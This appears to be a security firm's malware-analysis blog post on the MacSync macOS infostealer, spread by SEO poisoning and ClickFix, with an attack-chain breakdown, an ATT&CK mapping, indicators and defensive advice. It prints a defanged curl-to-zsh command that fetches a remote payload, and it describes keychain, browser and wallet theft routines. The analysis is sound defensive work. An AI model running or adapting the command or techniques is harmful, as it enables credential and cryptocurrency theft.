Emerging Threats · Featured · Malware Analysis
MacSync: when the victim types the attack chain
No exploit. No attachment. No phishing email. In this campaign the threat actor needs the victim to do exactly one thing: copy a command from an installation guide and paste it into the macOS Terminal. In the summer of 2026 our SOC intercepted that moment three times, on the same corporate endpoint, and blocked it three times. The target: a developer’s Mac. The payload: MacSync, an infostealer sold as Malware-as-a-Service and built for the Apple ecosystem.
This article has two halves. The first sets out the general mechanism: why the SEO Poisoning plus ClickFix combination works, why macOS is now a first-class target, and why a Malware-as-a-Service payload breaks classic attribution. The second is the technical evidence from the case our SOC handled: the reconstructed chain, the intercepted command, the code recovered during controlled detonation, and the MITRE ATT&CK and indicator detail.

▸ 1.1 A paradigm shift, not a new exploit
For years the mental model of endpoint compromise assumed a technical flaw somewhere: an unpatched CVE, a malicious macro, an attachment that drops a loader. This campaign has none of that. It never touches a vulnerability. It substitutes the exploit with the user, and it does so by weaponising two ordinary behaviours: trusting a top search result, and pasting a command from a guide into a terminal.
That substitution is what makes the technique dangerous across the board. Perimeter maturity, patch cadence, attachment sandboxing, none of it is in the path. The only controls left standing are behavioural detection at the endpoint and the user’s own judgement, and the whole campaign is engineered to defeat the second one.
▸ 1.2 macOS is no longer the quiet platform
The assumption that macOS is a low-risk environment is now an operational asset for the threat actor, not a fact for the defender. The proliferation of infostealers written specifically for macOS and sold under a MaaS model, MacSync among them, confirms that the Apple ecosystem has become an established target for financially motivated actors.
The target profile explains the interest. Developers, engineers and system administrators run macOS in large numbers, they treat the command line as a daily tool, they pull software from online repositories without a second thought, and they routinely hold exactly what a stealer wants: credentials to corporate infrastructure, cloud tokens, SSH keys, browser sessions and, in many cases, cryptocurrency wallets. The very habits that make these profiles productive are the habits ClickFix exploits.
▸ 1.3 SEO Poisoning: acquiring the victim
SEO Poisoning is the deliberate manipulation of the ranking factors search engines use, applied to push malicious content into the top results for chosen queries. The methods are the same ones legitimate SEO uses, turned to a fraudulent end.
Keyword-targeted content builds the malicious page around high-volume queries, typically the name of a popular tool or a commonly searched function. Artificial backlink networks inflate the authority the ranking algorithm perceives. And, decisively here, the campaign hosts its lure on GitHub: a platform with high domain reputation in the eyes of search engines, which speeds high-ranking placement, and high intrinsic trust in the eyes of a technical user, who reads a github.com URL as safe by default.
The result reframes the entire delivery. The victim does not receive a phishing email or click a link someone sent them. They run a search, get a result that looks relevant and legitimate, and follow it, on their own initiative. The suspicion threshold sits far lower than it would for an inbound message, and awareness programmes built only around email phishing never engage.
▸ 1.4 ClickFix: converting the victim into the delivery vector
ClickFix exploits a different psychological lever than classic phishing. It does not ask the user to click a malicious link. It asks them to actively perform a technical action, copying and running a terminal command, presented as a legitimate step in installing, updating or configuring software.
Four factors make it work. Familiarity: for developers and sysadmins, running commands copied from guides and documentation is routine, not anomalous. Absence of the usual phishing tells: no attachment to open, no credential form to fill, no obviously fake domain, only a command that looks generic and harmless. Delegated trust: the user extends the trust they already granted the repository or the site to the command itself, and skips the scrutiny they would apply to an unknown script. And an implicit bypass of perimeter controls: because the action is performed by hand inside a legitimate context, the user’s own terminal, it sidesteps controls built to block malicious attachments and links, leaving endpoint behavioural detection as the only technical line of defence.
Combined, SEO Poisoning and ClickFix remove the threat actor’s need for any technical vulnerability in the target. The whole vector rests on the victim’s voluntary, if deceptively induced, interaction with content they found themselves. That is what makes this class of threat relevant to any organisation, regardless of how mature its perimeter is.
▸ 2.1 Detection and chain reconstruction
During the summer of 2026 our SOC handled an alert on a corporate macOS laptop used by a technical profile (an engineer/developer) at a client organisation: an attempted execution of a malicious command. Our analysts reconstructed the full sequence, and it matched the mechanism above end to end. The user set out to install what they believed was legitimate software, reached a fraudulent GitHub repository ranked into the search results by SEO Poisoning, followed the fake installation guide it contained, and was redirected to an external site outside GitHub carrying a command line to run in the macOS Terminal.
A telling detail of how convincing the fake process was: the user ran the malicious command three separate times, treating the block as a step that had to succeed to finish the install, not as a warning. All three attempts were blocked before the download could complete.
▸ 2.2 The intercepted command
The command blocked on the endpoint, shown defanged to prevent accidental execution:
curl -kfsSL hxxp://robertjonesrealty[.]com/curl/720e1e04c2690ac14874d54823354d6bd06336b23e8458debaffeb2b18f5be6a | zsh
Reading the flags is instructive, because they were chosen to make the request quiet and robust rather than to look malicious. -s silences progress and error output, -f makes curl fail quietly on server errors instead of writing an error page to disk, -S restores error messages when -s is set, -L follows redirects (so the staging domain can hand off to another host), and -k disables TLS certificate verification, letting the download succeed against a host with a self-signed or invalid certificate. The path component is a 64-character hex string, consistent with a per-victim or per-campaign identifier used to gate and track delivery. The output is piped straight into zsh, the default shell on modern macOS, so nothing is ever written to disk as a file the user would see: the script executes in memory, in the user’s own session.
▸ 2.3 Inside MacSync: the recovered code
To establish what would have happened had the command not been blocked, our team detonated it in a controlled sandbox and recovered the malware’s own source. The flow it revealed, and the collection routines it runs, are summarised below, then walked through with the recovered code.

▸ 2.3.1 Stage one: the loader
The first script fetched by the curl call is base64-encoded and gzip-compressed, a wrapper that defeats trivial string inspection and content filters. It decodes and executes itself in memory with eval, so no file is dropped to disk.

base64 -D | gunzip into a variable, then eval. In-memory execution, no file on disk.▸ 2.3.2 Stage two: the OSA core and anti-detection
The decoded payload downloads and runs an OSA (Open Scripting Application) / AppleScript component. AppleScript is a native macOS automation layer, which lets the malware drive the operating system and applications through sanctioned interfaces rather than exotic API calls, reducing how anomalous it looks. Before harvesting anything, it closes every open Terminal window to lower the chance the user notices unusual output.

killall Terminal before collection begins.▸ 2.3.3 Collection routines
The OSA script carries a named routine for each data source. SafeSQLiteCopy copies browser databases together with their -wal and -shm journals, so live cookies and session tokens come out intact rather than locked or partial.

SafeSQLiteCopy: browser DB theft with WAL/SHM handling to capture live sessions.grabPlugins walks installed browser extensions and lifts their IndexedDB stores, and ChromiumWallets matches those extensions against a hardcoded list of crypto-wallet extension IDs, so wallet plugins are singled out for collection.

grabPlugins: iterate extensions, copy IndexedDB for matches.
ChromiumWallets: hardcoded crypto-wallet extension IDs targeted for theft.grabAllStorageKeys dumps the macOS keychain through helper files staged at /tmp/.kgrab.sh and /tmp/.kpwd, decoding a pre-built shell script from base64 to avoid quote-escaping.

grabAllStorageKeys: keychain dump via /tmp/.kgrab.sh and /tmp/.kpwd.Processes records system_profiler, ps ax and lsappinfo output for host fingerprinting, while DesktopWallets and Filegrabber pull local wallet folders and targeted files wholesale.

Processes, DesktopWallets, Filegrabber: host recon and wholesale wallet-folder collection.▸ 2.3.4 Staging, single-run lock and version tag
Collected data is written to a randomised /tmp/sync<random> working folder, guarded by a lock file (/tmp/macsync_<token>.lock) so the stealer runs once per host.

/tmp/sync<random> and single-run lock /tmp/macsync_<token>.lock.The malware stamps its own build into the collected set, an operator convenience that betrays a maintained, versioned MaaS product rather than a one-off. It also runs system_profiler for software, hardware and display details.

MacSync Stealer · Build Tag "New build 2" · 1.1.2_release (x64_86 & ARM).▸ 2.3.5 Exfiltration
A daemon_function uploads the archive in chunks to the C2, authenticated with a hardcoded api-key header and a spoofed macOS User-Agent, to a /dynamic endpoint keyed by the same 64-character token seen in the initial URL.

daemon_function: chunked upload to /dynamic?txd=<token> with an api-key header and spoofed User-Agent.▸ 2.3.6 The wallet endgame
The final routine is the most revealing about intent. If Ledger Live or Trezor Suite, the companion desktop apps for the two most common hardware wallets, are installed, MacSync downloads a trojanised build from the C2 and swaps out the genuine application bundle, replacing app.asar and Info.plist inside /Applications. This is persistence aimed squarely at the money: rather than hooking a system service, the threat actor plants itself inside the applications the victim uses to manage crypto assets, positioned to intercept future wallet interactions. It is compromise-for-theft dressed as persistence.

app.asar and Info.plist replaced.
▸ 2.4 Attribution: a cluster, not an actor
Our Threat Intelligence team tracks this activity as the Pulsar MacSync cluster, one of the 287 adversary groups and offensive tools currently in our CTI scope. The word cluster is deliberate. It groups campaigns that share TTPs, distribution infrastructure and final payload, for correlation and detection. It does not name a criminal group, and it is not meant to. The elements gathered in this case do not support attribution to a single actor, and are not intended to.

The reason is structural, not a shortfall of analysis. Classic attribution correlates C2 infrastructure, distinctive TTPs, code artefacts and, where available, geopolitical or motivational signals, and it implicitly assumes a stable link between an actor and its tools, that whoever builds the malware also operates it. The MaaS model severs that link. Development sits with one actor or small team, responsible for maintaining the stealer, evolving it and keeping it evasive, and selling it as a product or on an affiliate revenue-share. Operation, building campaigns, choosing distribution vectors, running the first-layer infrastructure (repositories, redirect sites, staging domains), is delegated to many affiliates or customers who may have no relationship to one another. And the C2 infrastructure is shared, reconfigured and resold between affiliates over time, dissolving the anchor attribution traditionally leans on.
So two campaigns delivering the same MacSync build, with the same technical capabilities and even similar distribution TTPs, can be run by two entirely separate groups whose only connection is having bought the same product on the same market. Attributing a MacSync campaign to a single intrusion set would confuse the manufacturer of a tool with whoever wields it, and would point response and defensive priorities at a target that does not exist.
The practical consequence drives the defensive posture. Once attribution to an actor loses operational meaning, detection has to anchor on the TTPs and behavioural indicators shared across campaigns using the same malware or the same distribution technique, whoever runs them. Static indicators (domains, hashes) rotate in days in a MaaS economy; the behavioural pattern (curl piped to a shell from a fresh domain, Terminal processes killed, archives staged in /tmp, trojanised wallet apps) persists across affiliates.
Nothing in the case points to targeting of this client, this sector or this country. SEO Poisoning on generic queries is a net, not a spear. That does not shrink the threat, it widens it: any organisation with macOS endpoints in technical hands is inside the exposure surface.
▸ 2.5 MITRE ATT&CK mapping
| Tactic | Technique | ID |
|---|---|---|
| Resource Development | Stage Capabilities: SEO Poisoning | T1608.006 |
| Execution | User Execution: Malicious Copy and Paste | T1204.004 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Execution | Command and Scripting Interpreter: AppleScript | T1059.002 |
| Command and Control | Ingress Tool Transfer | T1105 |
| Defense Evasion | Deobfuscate/Decode Files or Information (base64 + gzip) | T1140 |
| Defense Evasion | Impair Defenses / kill Terminal processes | T1562 |
| Credential Access | Credentials from Password Stores: Keychain | T1555.001 |
| Credential Access | Credentials from Web Browsers | T1555.003 |
| Discovery | System Information Discovery (system_profiler) | T1082 |
| Discovery | Process Discovery | T1057 |
| Collection | Data from Local System | T1005 |
| Collection | Archive Collected Data | T1560 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |
| Persistence | Compromise Host Software Binary (trojanised Ledger/Trezor) | T1554 |
▸ 2.6 Indicators of Compromise
| Indicator (defanged) | Type | Role |
|---|---|---|
robertjonesrealty[.]com | Domain | Staging + C2: payload delivery (/curl/, /ledger/, /trezor/) and exfil endpoint (/dynamic) |
ohdentalimplants[.]com | Domain | Staging domain serving the second-stage payload |
/tmp/sync<random>/ | Path | Randomised collection folder |
/tmp/osalogging.zip | Path | Archive of collected data prepared for exfiltration |
/tmp/macsync_<token>.lock | Path | Single-run lock file (token = 64-char campaign id) |
/tmp/.kgrab.sh · /tmp/.kpwd | Path | Keychain-dump helper and password file |
api-key: 5190ef1733183a0dc63fb623357f56d6 | HTTP header | Exfiltration authentication (campaign/affiliate key) |
MacSync Stealer · 1.1.2_release (x64_86 & ARM) · Build Tag "New build 2" | String | Malware self-reported version fingerprint |
Indicators are already integrated into the Fortgale Intelligence Feed for preventive blocking across our client base, and will be updated as the Pulsar MacSync infrastructure evolves.
▸ 2.7 Post-incident verification and outcome
After the analysis, our team ran thorough checks on the affected host to rule out additional attack vectors or alternative access paths used in parallel, then extended verification across the client’s systems and infrastructure. No suspicious activity, no indicators of compromise. The event stayed confined to a compromise attempt blocked at its first stage: no host compromise, no final payload execution, no data exfiltration.
The favourable outcome is not the point. The value of the case is that it was a near-miss: a technically well-orchestrated attempt that came within one blocked command of running a stealer on a corporate endpoint, and was stopped not by a mistake on the threat actor’s side but by the defensive controls in place. Without behavioural detection at the endpoint the outcome would, in all likelihood, have been the download of MacSync and the exfiltration of credentials and wallet data.
Immediate. Block the indicators above. Alert on shell processes spawned from curl | sh / curl | zsh patterns on macOS endpoints, and on mass termination of Terminal processes. Confirm endpoint coverage actually extends to the Mac fleet: the perception of macOS as low-risk is now working for the threat actor.
Short term. Take awareness content beyond email phishing. Developers and sysadmins need to see ClickFix specifically, because their command-line routine is exactly what the technique turns against them. Review software installation paths for technical staff: approved repositories, package managers with signature verification.
Structural. Move detection investment from static indicators towards behavioural analytics at the endpoint and identity level. In a MaaS landscape the campaign changes weekly; the TTPs are the stable surface, and the human remains the most exposed link regardless of technical skill, precisely because familiarity with the command line is what ClickFix exploits.
A cyber attack is not something. It is someone. In this campaign, someone who never had to touch the target: the victim typed the attack chain for them, three times, and it was blocked three times, because the defence was watching behaviour, not a list of known threats.
Knowing the adversary is the first act of defence. Stopping them in time is the second.
Talk to our analysts about ClickFix detection on macOS fleets, or request a threat briefing on the Pulsar MacSync cluster.